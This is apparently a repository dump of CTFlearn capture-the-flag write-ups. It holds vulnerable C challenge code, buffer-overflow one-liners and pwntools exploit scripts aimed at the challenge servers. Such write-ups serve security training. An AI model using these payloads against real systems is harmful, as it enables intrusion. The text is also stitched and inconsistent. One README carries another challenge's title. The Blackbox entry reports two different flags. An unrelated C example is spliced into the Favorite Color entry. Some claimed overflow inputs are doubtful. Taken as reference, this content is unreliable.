├── Binary ├── Accumulator │ ├── Flag.png │ ├── README.md │ ├── task │ ├── task.c │ ├── task.tar │ └── task.tar.gz ├── Blackbox │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── Flag.png │ └── README.md ├── Favorite Color │ └── README.md ├── Jenny │ ├── Jenny.class │ └── README.md ├── Lazy Game Challenge │ ├── Flag.png │ └── README.md ├── Poor Login │ ├── Flag.png │ ├── README.md │ ├── exploit.py │ ├── login.tar.gz │ └── pwn-login │ │ ├── login │ │ └── login.c ├── README.md ├── RIP my bof │ ├── README.md │ ├── pwn-simple-rip │ │ ├── bof2.c │ │ └── server │ └── simple-rip.tar.gz └── Simple bof │ ├── 1.png │ ├── Flag.png │ ├── README.md │ ├── bof.c │ └── exploit.py ├── Cryptography ├── 3's or 16's? Don't Ask Me! │ ├── 1.png │ ├── 2.png │ ├── 3's or 16's.txt │ ├── 3.png │ ├── 4.png │ ├── 5.png │ ├── Flag.png │ └── README.md ├── 5x5 Crypto │ ├── Flag.py │ ├── README.md │ └── Table.png ├── ALEXCTF CR2: Many time secrets │ ├── README.md │ ├── cribdrag.py │ └── msg (4) ├── Base 2 2 the 6 │ ├── Decode.png │ └── README.md ├── BruXOR │ ├── Flag.png │ ├── Input.png │ └── README.md ├── Character Encoding │ └── README.md ├── CoppeRSA Lattice │ ├── README.md │ └── exploit.py ├── Defying Hell │ ├── Flag.png │ ├── README.md │ ├── data.txt │ └── exploit.py ├── Encryption Master │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── Flag.png │ ├── Here ya go!.txt │ └── README.md ├── Hextroadinary │ ├── README.md │ └── xor.png ├── HyperStream Test #2 │ ├── Flag.png │ └── README.md ├── Image Editing │ ├── Flag.png │ ├── README.md │ ├── exploit.py │ ├── final.png │ ├── half.png │ └── stegsolve.png ├── Linear-feedback. Shift. Register │ ├── Flag.png │ ├── PRNG.zip │ ├── README.md │ ├── description.png │ ├── exploit.py │ └── secretMessage.hex ├── Modern Gaius Julius Caesar │ └── README.md ├── Morse Code │ ├── Flag.png │ └── README.md ├── Nasty Little Doctorses! 
│ ├── Flag.png │ └── README.md ├── RSA Beginner │ ├── Flag.py │ ├── README.md │ └── rsa (1).txt ├── RSA Noob │ ├── Factorize.png │ ├── Flag.py │ ├── README.md │ └── rsanoob (1).txt ├── Reverse Polarity │ ├── Covert.png │ └── README.md ├── Skynet Is (Almost) Taking Over │ ├── README.md │ └── Skynet.txt ├── So many 64s │ ├── README.md │ ├── exploit.py │ └── flag.txt ├── Substitution Cipher │ ├── Flag.png │ ├── Input.png │ ├── README.md │ └── Substitution.txt ├── Suspecious message │ ├── Flag.png │ ├── README.md │ └── photo.png ├── Symbolic Decimals │ ├── Flag.png │ └── README.md ├── The Simpsons │ ├── Flag.png │ ├── ItsKrumpingTime.jpg │ ├── README.md │ ├── encoding.py │ └── key.py ├── Tone dialing │ ├── Flag.png │ ├── README.md │ └── you_know_what_to_do.wav ├── Vigenere Cipher │ ├── Flag.png │ └── README.md ├── We want Nudes instead of Nukes │ ├── README.md │ └── exploit.py ├── Zippy.zip │ ├── Flag.png │ ├── README.md │ ├── crack.py │ ├── exploit.png │ ├── exploit.py │ ├── exploit.sh │ ├── flag_parts.zip │ └── flag_parts │ │ ├── flag00.zip │ │ ├── flag01.zip │ │ ├── flag02.zip │ │ ├── flag03.zip │ │ ├── flag04.zip │ │ ├── flag05.zip │ │ ├── flag06.zip │ │ ├── flag07.zip │ │ ├── flag08.zip │ │ ├── flag09.zip │ │ ├── flag10.zip │ │ ├── flag11.zip │ │ ├── flag12.zip │ │ └── flag13.zip └── otpyrC │ ├── 1.png │ ├── Flag.png │ ├── README.md │ └── Reverse.png ├── Forensics ├── 07601 │ ├── AGT.png │ └── README.md ├── A CAPture of a Flag │ ├── Base64.png │ ├── HTTP.png │ ├── README.md │ └── flag (4) ├── Binwalk │ ├── PurpleThing.jpeg │ └── README.md ├── Blank Page │ ├── 1.png │ ├── Flag.png │ ├── README.md │ ├── TheMessage.txt │ └── exploit.py ├── Bobby Toe's iPad │ ├── README.md │ ├── bobbytoesipad.png │ ├── hex.png │ ├── otp.png │ ├── split.png │ └── stego.png ├── Brute Force is Fun! 
│ ├── README.md │ ├── legotroopers.jpg │ └── output │ │ ├── audit.txt │ │ ├── jpg │ │ └── 00000000.jpg │ │ └── zip │ │ ├── 00000012.zip │ │ ├── exploit.py │ │ ├── flag.txt │ │ ├── flag.zip │ │ └── folders │ │ └── 73 │ │ ├── 43 │ │ └── p │ │ └── 47 │ │ └── p ├── Chalkboard │ ├── README.md │ └── math.jpg ├── Corrupted File │ ├── Edit.png │ ├── Flag.png │ ├── README.md │ ├── unopenable.gif │ └── unopenable1.gif ├── Digital Camouflage │ ├── Base64.png │ ├── README.md │ ├── TCP_Stream.png │ ├── TCP_Stream_Eq_0.png │ ├── TCP_Stream_Eq_3.png │ └── data.pcap ├── Dumpster │ ├── Decryptor.java │ ├── README.md │ ├── dumpster.zip │ └── heapdump.hprof ├── Exclusive Santa │ ├── Exclusive_Santa.rar │ ├── Flag.png │ └── README.md ├── Exif │ ├── Computer-Password-Security-Hacker - Copy.jpg │ └── README.md ├── Forensics 101 │ ├── 95f6edfb66ef42d774a5a34581f19052.jpg │ └── README.md ├── GandalfTheWise │ ├── Flag.png │ ├── Gandalf.jpg │ ├── README.md │ ├── String1.png │ ├── String2.png │ └── String3.png ├── Git Is Good │ ├── README.md │ ├── gitIsGood.zip │ └── gitIsGood │ │ └── flag.txt ├── HailCaesar! 
│ ├── Base64.png │ ├── Flag.png │ ├── HailCaesar.jpg │ └── README.md ├── I'm a dump │ ├── README.md │ └── file ├── Jakarta │ ├── Flag.png │ ├── Jakarta.jpg │ ├── README.md │ ├── jakarta.py │ ├── jakarta_data.png │ ├── jakarta_data.py │ ├── jakarta_flag │ └── jakarta_rsa.key ├── Milk's Best Friend │ ├── README.md │ ├── _oreo.jpg.extracted │ │ ├── 1 │ │ │ ├── a │ │ │ └── b.jpg │ │ └── 252B.rar │ ├── b.jpg │ └── oreo.jpg ├── Minions │ ├── Hey_You.png │ ├── Only_Few_Steps.jpg │ ├── README.md │ ├── YouWon(Almost).png │ ├── _Hey_You.png.extracted │ │ ├── 0 │ │ ├── 5B │ │ ├── 5B-0 │ │ ├── D3EDB │ │ └── You_Still_Here │ │ │ └── Nothing_Here_16 │ │ │ └── ..txt │ └── _Only_Few_Steps.jpg.extracted │ │ ├── 0 │ │ ├── 22806 │ │ ├── 1AA │ │ └── 1E ├── MountainMan │ ├── Flag.png │ ├── Hexdump.png │ ├── MountainMan.jpg │ └── README.md ├── Mr.Bin │ ├── 600x600_picture │ ├── D0F0.zip │ ├── D0F0 │ │ └── bin │ ├── README.md │ ├── bin │ ├── binwalk.png │ ├── exploit.py │ ├── image.jpg │ ├── password.png │ └── strings.out ├── Music To My Ears │ ├── README.md │ └── hereisyourflag.m4a ├── Naughty Cat │ ├── README.md │ └── cut3_c4t.png ├── PDF by fdpumyp │ ├── README.md │ └── dontopen.pdf ├── Pho Is Tasty! 
│ ├── Flag.png │ ├── Pho.jpg │ └── README.md ├── PikesPeak │ ├── PikesPeak.jpg │ └── README.md ├── QR-code inception │ ├── README.md │ ├── flag.png │ ├── flag_qr.png │ ├── inception.png │ └── qr.py ├── Rubber Duck │ ├── README.md │ └── RubberDuck.jpg ├── Seeing is believing │ ├── Flag.png │ ├── README.md │ ├── Spectogram.png │ ├── message.zip │ └── seeingisbelieving │ │ ├── help (copy).ogg │ │ └── help.me ├── ShahOfGimli │ ├── 0 │ ├── Gimli04Base.jpg │ ├── README.md │ ├── ShahOfGimli.jpg │ ├── _ShahOfGimli.jpg.extracted │ │ ├── 0 │ │ ├── 20517.tar │ │ ├── Gimli04Base.jpg │ │ ├── flag.enc │ │ └── flag.txt │ └── flag.txt ├── Simple Steganography │ ├── Minions1.jpeg │ ├── README.md │ └── raw.txt ├── Smiling ASCII │ ├── ALTERNATIVE.md │ ├── README.md │ ├── data_extract.png │ ├── interference.png │ └── smiling.png ├── Snowboard │ ├── README.md │ ├── Snowboard.jpg │ └── _Snowboard.jpg.extracted │ │ ├── 0 │ │ ├── 393B │ │ ├── 395D │ │ ├── 3A4 │ │ └── 5A ├── Taking LS │ ├── README.md │ ├── The Flag.zip │ └── The Flag │ │ └── The Flag.pdf ├── The Data Scientist │ ├── README.md │ └── the_data_scientist.csv ├── The Keymaker │ ├── README.md │ ├── The-Keymaker.jpg │ ├── flag │ └── flag.enc ├── The adventures of Boris Ivanov. Part 1. │ ├── Boris_Ivanov_1.jpg │ ├── Flag.png │ └── README.md ├── Tux! │ ├── Base64.png │ ├── README.md │ ├── Tux.jpg │ └── _Tux.jpg.extracted │ │ ├── 1570.zip │ │ └── flag ├── Up For A Little Challenge? │ ├── Begin Hack.jpg │ ├── Did I Forget Again? │ │ ├── Loo Nothing Becomes Useless ack.jpg │ │ └── skycoder.jpg │ ├── README.md │ └── Up For A Little Challenge.zip ├── WOW.... 
So Meta │ ├── 3UWLBAUCb9Z2.jpg │ └── README.md ├── abandoned place │ ├── Hex1.png │ ├── Hex2.png │ ├── README.md │ ├── abondoned_street_challenge2.jpg │ └── abondoned_street_challenge2_altered.jpg └── office flag │ ├── README.md │ ├── flag.odt │ └── flag.zip ├── LICENSE ├── Miscellaneous ├── Ambush Mission │ ├── Base64.png │ ├── Flag.png │ ├── README.md │ ├── Reversal.png │ └── clue.png ├── Android, run! │ ├── Flag.png │ ├── README.md │ └── Run.apk ├── F1L3 M1X3R │ ├── Flag.jpeg │ ├── README.md │ ├── Repair.png │ ├── Unrepair.png │ ├── exploit.py │ └── fl4g.jpeg ├── Get Into Command Mission │ ├── Dump.txt │ ├── Flag.png │ ├── README.md │ └── program.exe ├── Help Bity │ └── README.md ├── Practice Flag │ └── README.md ├── QR Code v2 │ ├── Flag.txt │ ├── README.md │ ├── Scan.png │ └── qr_code.jpg ├── QR Code │ ├── Base64.png │ ├── README.md │ ├── ROT13.png │ ├── Scan.png │ └── qrcode.39907201.png ├── Reversal of fortune │ └── README.md ├── Rock Paper Scissors │ ├── Flag.png │ └── README.md ├── Time Traveller │ ├── Flag.png │ ├── README.md │ ├── Web1.png │ └── Web2.png ├── What could this be? │ ├── Input.png │ ├── Output.png │ ├── README.md │ └── what_can_this_be.txt ├── Where Can My Robot Go? │ └── README.md └── Wikipedia │ ├── 1.png │ ├── 2.png │ ├── 3.png │ └── README.md ├── Programming ├── An Old Image │ ├── Flag.png │ ├── README.md │ ├── exploit.py │ ├── new_image.png │ └── old_image.png ├── AndhraPradesh Assembler Chall │ ├── AndhraPradesh │ ├── AndhraPradesh.asm │ ├── AndhraPradesh.o │ ├── AndhraPradesh.zip │ ├── README.md │ ├── clnasm.sh │ └── readme ├── Dawn's Lawn │ ├── Flag.py │ ├── README.md │ ├── dawn.txt │ └── dawn2.txt ├── Fabio's Nachos │ ├── Base64.png │ ├── Flag.png │ ├── README.md │ ├── base.txt │ └── exploit.py ├── Image Magic │ ├── ALTERNATE.md │ ├── Exploit.py │ ├── Flag.jpg │ ├── README.md │ ├── flag.png │ ├── out copy.jpg │ └── script.py ├── Is it the Flag? 
(JAVA) │ ├── Flag.py │ ├── IsItTheFlag.java │ └── README.md ├── Old memories │ ├── 1.png │ ├── 2.png │ ├── README.md │ ├── exploit.py │ ├── flag.png │ └── hisss.zip ├── Programming a language │ ├── Flag.png │ ├── README.md │ ├── exploit.py │ └── input.txt ├── Python Reversal │ ├── README.md │ ├── exploit.py │ └── rev.py ├── Read in Color │ ├── README.md │ ├── color_img.png │ └── exploit.py ├── Simple Programming │ ├── Flag.py │ ├── README.md │ └── data.dat ├── The Adventures of Boris Ivanov Part 2 │ ├── Concatenate.py │ ├── README.md │ ├── concatenate.png │ └── confetti.zip └── Weird Android Calculator │ └── README.md ├── README.md ├── Reverse ├── Basic Android RE 1 │ ├── BasicAndroidRE1.apk │ ├── Flag.png │ └── README.md ├── Bite-code │ ├── Bruteforce.c │ ├── README.md │ └── bitecode.txt ├── Every Bit Counts │ ├── README.md │ └── every_bit_counts ├── Finish The Flag │ ├── Flag.png │ ├── README.md │ ├── exec.png │ ├── exec.py │ ├── exec_bin │ ├── exploit.py │ ├── finish_the_flag │ │ ├── qr.asm.enc │ │ ├── qr.png │ │ └── readme.txt │ ├── letter.zip │ ├── objdump.png │ └── qr.png ├── Jumper │ ├── README.md │ ├── flag │ ├── flag.c │ └── jump.asm ├── Lost In The Binary │ ├── Crack.py │ ├── README.md │ └── lost_in_bin ├── PIN │ ├── README.md │ ├── rev1 │ └── rev1.i64 ├── PyDis │ ├── Flag.png │ ├── README.md │ ├── dis.txt │ └── exploit.py ├── RE_verseDIS │ ├── README.md │ └── problem ├── Ramada │ ├── Flag.png │ ├── README.md │ ├── Ramada │ ├── Ramada.zip │ ├── exploit.py │ ├── readme │ ├── reversing │ └── sources.zip.enc ├── Rangoon │ ├── README.md │ ├── Rangoon │ ├── Rangoon.md │ ├── Rangoon.zip │ ├── readme │ └── sources.zip.enc ├── Raspberry │ ├── Flag.png │ ├── README.md │ ├── Raspberry │ ├── Raspberry.zip │ ├── exploit.py │ ├── readme │ └── sources.zip.enc ├── Recklinghausen │ ├── Flag.png │ ├── README.md │ ├── Recklinghausen │ ├── Recklinghausen.zip │ ├── exploit.py │ ├── readme │ └── sources.zip.enc ├── Reverse Me │ ├── Flag.png │ ├── README.md │ ├── exploit.py │ 
└── reverseme ├── Reykjavik │ ├── README.md │ ├── Reykjavik │ ├── Reykjavik.zip │ └── readme ├── Rotterdam Reversing Challenge │ ├── Flag.png │ ├── README.md │ ├── Rotterdam │ ├── Rotterdam_1.zip │ ├── exploit.py │ ├── readme │ ├── rotterdam.asm │ └── sources.zip.enc ├── Rzeszow │ ├── Flag.png │ ├── README.md │ ├── Rzeszow │ ├── Rzeszow.zip │ ├── exploit.py │ ├── readme │ ├── reversing │ └── sources.zip.enc ├── The Super Secure Service │ ├── README.md │ ├── Web1.png │ ├── code.dat │ └── exploit.py └── Time to Eat │ ├── README.md │ └── eat.py ├── Web ├── AudioEdit │ ├── Flag1.png │ ├── Flag2.png │ ├── README.md │ └── Web1.png ├── Basic Injection │ └── README.md ├── Calculat3 M3 │ ├── Flag.png │ ├── Inspect.png │ └── README.md ├── Don't Bump Your Head(er) │ ├── README.md │ └── Web1.png ├── Gobustme 👻 │ ├── README.md │ ├── common.txt │ ├── results.png │ └── setup.png ├── Grid It! │ └── README.md ├── Inj3ction Time │ ├── Flag.png │ └── README.md ├── My Blog │ ├── Flag.png │ ├── README.md │ ├── Web1.png │ └── Web2.png ├── POST Practice │ ├── README.md │ └── Web_Page.png └── Prehashbrown │ ├── README.md │ ├── Register.png │ └── Search.png └── _config.yml

/Binary/Accumulator/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Accumulator/Flag.png

--------------------------------------------------------------------------------
/Binary/Accumulator/README.md:
--------------------------------------------------------------------------------
## AndhraPradesh Assembler Chall
The main idea is finding the flag using the buffer overflow technique.

#### Step-1:
We are given `task.c`, which contains the C code that is used to fetch the flag.

```c
...
    int acc = 0;
    int n;
    while (acc >= 0){
        printf("acc = %d\n", acc);
        printf("Enter a number: ");

        if (scanf("%d", &n) != 1){
            puts("Error reading integer");
        } else {
            if (n < 0){
                puts("You can't enter the negative number!");
            } else {
                acc += n;
            }
        }
    }

    printf("You win! acc = %d\n", acc);
...
```

#### Step-2:
By manipulating the value of `n`, we change the value of `acc`, and that is what we have to exploit: negative inputs are rejected, so the loop can only end when the signed `int` `acc` itself becomes negative. After some trial and error, we find that for the value `n = 99999999999999999`, the `acc` variable overflows.

#### Step-3:
The final execution can be shown as below.



#### Step-4:
Finally the flag becomes:
`CTFlearn{n3x7_7yp3_0f_0v3rf0w}`

--------------------------------------------------------------------------------
/Binary/Accumulator/task:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Accumulator/task

--------------------------------------------------------------------------------
/Binary/Accumulator/task.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>

int main(){
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stdin, NULL, _IONBF, 0);

    int acc = 0;
    int n;
    while (acc >= 0){
        printf("acc = %d\n", acc);
        printf("Enter a number: ");

        if (scanf("%d", &n) != 1){
            puts("Error reading integer");
        } else {
            if (n < 0){
                puts("You can't enter the negative number!");
            } else {
                acc += n;
            }
        }
    }

    printf("You win! acc = %d\n", acc);
    system("cat ./flag.txt");
}

--------------------------------------------------------------------------------
/Binary/Accumulator/task.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Accumulator/task.tar.gz

--------------------------------------------------------------------------------
/Binary/Blackbox/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Blackbox/1.png

--------------------------------------------------------------------------------
/Binary/Blackbox/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Blackbox/2.png

--------------------------------------------------------------------------------
/Binary/Blackbox/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Blackbox/3.png

--------------------------------------------------------------------------------
/Binary/Blackbox/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Blackbox/Flag.png

--------------------------------------------------------------------------------
/Binary/Blackbox/README.md:
--------------------------------------------------------------------------------
## Blackbox
The main idea of finding the flag is String Overflow.

#### Step-1:
After I SSH'ed in with `ssh blackbox@104.131.79.111 -p 1001` and the password `guest` (given), I got this:



#### Step-2:
So, I tried to run the `blackbox` file.



#### Step-3:
Now it was time to go wild. So, I gave very big inputs to see the threshold of the String Overflow.



#### Step-4:
So, let's just print more than 80 characters, because the string overflow occurs at the 81st character.
Executing this one-liner gives us the flag.

```bash
python -c "print '11111111111111111111111111111111111111111111111111111111111111111111111111111111\x02\x00\x00\x00'" | ./blackbox
```
Output:

```bash
What is 1 + 1 = CORRECT! You get flag:
flag{0n3_4lus_1_1s_Tw0_dumm13!!}

[2]+ Stopped python -c "print '11111111111111111111111111111111111111111111111111111111111111111111111111111111\x02\x00\x00\x00'" | ./blackbox
```



#### Step-5:
Finally, the flag becomes:
`the_flag_is{A_sP3c7r0grAm?!}`

--------------------------------------------------------------------------------
/Binary/Favorite Color/README.md:
--------------------------------------------------------------------------------
## Favorite Color
The main idea of finding the flag is exploiting the Buffer Overflow of the binary file.

#### Step-1:
After logging in remotely with `ssh color@104.131.79.111 -p 1001` and the password `guest`,
my system crashed completely due to several DDoS attacks. So, I looked up a solution directly and worked through it from there.
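
Why the Blackbox input earlier on this page needs exactly 80 filler bytes before `\x02\x00\x00\x00`, and what a bounded read changes; this is an added example, not code from the write-up or the challenge binary. The struct layout (an 80-byte buffer directly followed by a 32-bit integer) and every function name are assumptions, and the expected value 2 assumes a little-endian machine.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN 80   /* from the write-up: the 81st byte is the first to spill */

/* Assumed layout (the Blackbox source is not on the page): an 80-byte text
 * buffer followed directly by a 32-bit integer. 80 is a multiple of 4, so the
 * compiler inserts no padding between the two members. */
struct frame {
    char    buf[BUF_LEN];
    int32_t value;
};

/* Rebuilds the input quoted in the write-up: 80 x '1', then 02 00 00 00.
 * Constructed here so the example runs offline. Returns its length (84). */
size_t page_payload(unsigned char out[sizeof(struct frame)])
{
    memset(out, '1', BUF_LEN);
    out[BUF_LEN + 0] = 0x02;
    out[BUF_LEN + 1] = 0x00;
    out[BUF_LEN + 2] = 0x00;
    out[BUF_LEN + 3] = 0x00;
    return BUF_LEN + 4;
}

/* Models an unbounded read such as gets(): every input byte is stored,
 * whatever the size of buf. The copy targets the whole frame and is capped
 * at sizeof(struct frame) so that this demonstration itself stays defined. */
int32_t unbounded_read(const unsigned char *in, size_t len)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    if (len > sizeof f)
        len = sizeof f;
    memcpy(&f, in, len);          /* bytes 81..84 land in f.value */
    return f.value;
}

/* Hardened counterpart, same contract as fgets(buf, sizeof buf, stdin):
 * at most BUF_LEN - 1 bytes are stored, the buffer is always terminated,
 * and the caller is told when input was cut off. */
int32_t bounded_read(const unsigned char *in, size_t len, int *truncated)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    *truncated = len > BUF_LEN - 1;
    if (*truncated)
        len = BUF_LEN - 1;
    memcpy(f.buf, in, len);
    f.buf[len] = '\0';
    return f.value;               /* never touched by the copy */
}

/* Smallest all-'1' input length that changes the neighbouring integer. */
size_t first_corrupting_length(void)
{
    unsigned char in[sizeof(struct frame)];
    memset(in, '1', sizeof in);
    for (size_t len = 0; len <= sizeof in; len++)
        if (unbounded_read(in, len) != 0)
            return len;
    return 0;
}

int main(void)
{
    unsigned char payload[sizeof(struct frame)];
    size_t n = page_payload(payload);
    int truncated = 0;

    printf("unbounded read: value = %d\n", (int)unbounded_read(payload, n));
    printf("bounded read:   value = %d", (int)bounded_read(payload, n, &truncated));
    printf(" (truncated = %d)\n", truncated);
    printf("first corrupting length = %zu\n", first_corrupting_length());
    return 0;
}
```
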

https://www.embeddedhacker.com/2020/01/hacking-walkthrough-ctflearn-binary-medium/



#### Step-2:

Finally the flag becomes:
`flag{c0lor_0f_0verf1ow}`

--------------------------------------------------------------------------------
/Binary/Jenny/Jenny.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Jenny/Jenny.class

--------------------------------------------------------------------------------
/Binary/Jenny/README.md:
--------------------------------------------------------------------------------
## Jenny
The main idea to find the flag is Java decompiling on Ubuntu 18.04 LTS or above.

#### Step-1:

https://www.youtube.com/watch?v=no00Ec3YxXc

#### Step-2:
Finally, the flag becomes:
`N0w_1_kn0w_wh0_jen1_1s!11JNI_IS_SO_COOL!`

--------------------------------------------------------------------------------
/Binary/Lazy Game Challenge/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Lazy Game Challenge/Flag.png

--------------------------------------------------------------------------------
/Binary/Lazy Game Challenge/README.md:
--------------------------------------------------------------------------------
## Lazy Game Challenge
The main idea of finding the flag is thinking differently to break the logic in the binary file.

#### Step-1:
After connecting to the given machine with `nc thekidofarcrania.com 10001`, we are asked to play a betting game.

#### Step-2:
I input Y and proceeded to see the game. In the given scenario, I seemed to lose every bet of 100$. So I had to do something differently.

#### Step-3:
This time I placed a bet of a hefty number like `$1000000`, which I didn't even possess. It spat out errors. :worried:

#### Step-4:
But the main idea in pwning lies in abnormal thinking, and that's where you focus. This time I tried a negative number for the bet, like -100000$. I could still play, which shows there was a program logic flaw there.

Now I went wild and gave all the numbers (which I had to guess below 10) as greater than 10. Finally it gave me the flag.



#### Step-5:
Finally the flag becomes:
`CTFlearn{d9029a08c55b936cbc9a30_i_wish_real_betting_games_were_like_this!}`

--------------------------------------------------------------------------------
/Binary/Poor Login/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Poor Login/Flag.png

--------------------------------------------------------------------------------
/Binary/Poor Login/exploit.py:
--------------------------------------------------------------------------------
import pwn

host = "thekidofarcrania.com"
port = 13226
target = "./pwn-login/login"

class Menu:

    def __init__(self, remote):
        if remote:
            self.pr = pwn.connect(host, port)
        else:
            self.pr = pwn.process(target)

    def login(self, name):
        self.pr.sendlineafter("> ", "1")
        self.pr.sendlineafter("Username: ", name)

    def sign_out(self):
        self.pr.sendlineafter("> ", "2")

    def print_flag(self, flag):
        self.pr.sendlineafter("> ", "3")
        line = self.pr.readline()
        if line.startswith(b"You are not admin."):
            self.pr.sendline(flag)
        else:
            print(line)
            print(self.pr.readline())

    def lock_user(self):
        self.pr.sendlineafter("> ", "4")

    def restore_user(self):
        self.pr.sendlineafter("> ", "5")


def exploit(remote):

    menu = Menu(remote)

    try:
        menu.login('A'*31)
        menu.lock_user()
        menu.sign_out()
        menu.print_flag(b'\x01'*40)
        menu.restore_user()
        menu.print_flag("")
    except Exception as ex:
        print(ex)
    finally:
        menu.pr.close()

exploit(True)

--------------------------------------------------------------------------------
/Binary/Poor Login/login.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Poor Login/login.tar.gz

--------------------------------------------------------------------------------
/Binary/Poor Login/pwn-login/login:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Poor Login/pwn-login/login

--------------------------------------------------------------------------------
/Binary/README.md:
--------------------------------------------------------------------------------
## Binary Challenges


Binaries, or executables, are machine code for a computer to execute. For the most part, the binaries that you will face in CTFs are Linux ELF files or the occasional Windows executable. Binary Exploitation is a broad topic within Cyber Security which really comes down to finding a vulnerability in the program and exploiting it to gain control of a shell or modify the program's functions.


## Solved Challenges List

1. [Blackbox](./Blackbox/README.md)
2. [Favorite Color](./Favorite%20Color/README.md)
3. [Jenny](./Jenny/README.md)
4. [Lazy Game Challenge](./Lazy%20Game%20Challenge/README.md)
5. [RIP my bof](./RIP%20my%20bof/README.md)
6. [Simple bof](./Simple%20bof/README.md)

--------------------------------------------------------------------------------
/Binary/RIP my bof/README.md:
--------------------------------------------------------------------------------
## RIP my bof
The main idea of finding the flag is Buffer Overflow.

#### Step-1:
I checked out this writeup to get the flag and understand the method of solving.

https://n00bmaster.me/posts/CTFLearn_Easy_Pwn/

#### Step-2:
Finally, the flag becomes:
`CTFlearn{c0ntr0ling_r1p_1s_n0t_t00_h4rd_abjkdlfa}`

--------------------------------------------------------------------------------
/Binary/RIP my bof/pwn-simple-rip/bof2.c:
--------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Defined in a separate source file for simplicity.
void init_visualize(char* buff);
void visualize(char* buff);

void win() {
    system("/bin/cat /flag.txt");
}

void vuln() {
    char padding[16];
    char buff[32];

    memset(buff, 0, sizeof(buff)); // Zero-out the buffer.
    memset(padding, 0xFF, sizeof(padding)); // Mark the padding with 0xff.

    // Initializes the stack visualization. Don't worry about it!
    init_visualize(buff);

    // Prints out the stack before modification
    visualize(buff);

    printf("Input some text: ");
    gets(buff); // This is a vulnerable call!

    // Prints out the stack after modification
    visualize(buff);
}

int main() {
    setbuf(stdout, NULL);
    setbuf(stdin, NULL);
    vuln();
}

--------------------------------------------------------------------------------
/Binary/RIP my bof/pwn-simple-rip/server:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/RIP my bof/pwn-simple-rip/server

--------------------------------------------------------------------------------
/Binary/RIP my bof/simple-rip.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/RIP my bof/simple-rip.tar.gz

--------------------------------------------------------------------------------
/Binary/Simple bof/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Simple bof/1.png

--------------------------------------------------------------------------------
/Binary/Simple bof/Flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Binary/Simple bof/Flag.png

--------------------------------------------------------------------------------
/Binary/Simple bof/exploit.py:
--------------------------------------------------------------------------------
from pwn import *
# secret is the value that we want to overwrite the target string with
# The p32 function packs the value in little-endian format
secret = p32(0x67616c66)
padding = b"\x41" * 48

p = remote("thekidofarcrania.com", 35235)
p.recv()
p.sendline(padding + secret)
p.interactive()

--------------------------------------------------------------------------------
/Cryptography/3's or 16's? Don't Ask Me!/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/3's or 16's? Don't Ask Me!/1.png

--------------------------------------------------------------------------------
/Cryptography/3's or 16's? Don't Ask Me!/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/3's or 16's? Don't Ask Me!/2.png

--------------------------------------------------------------------------------
/Cryptography/3's or 16's? Don't Ask Me!/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/rishitsaiya/CTFlearn-Writeups/baeee9d2eb3e7cdd049d7a50b8b3b510a09359a1/Cryptography/3's or 16's? Don't Ask Me!/3.png

--------------------------------------------------------------------------------
/Cryptography/3's or 16's? Don't Ask Me!/4.png:
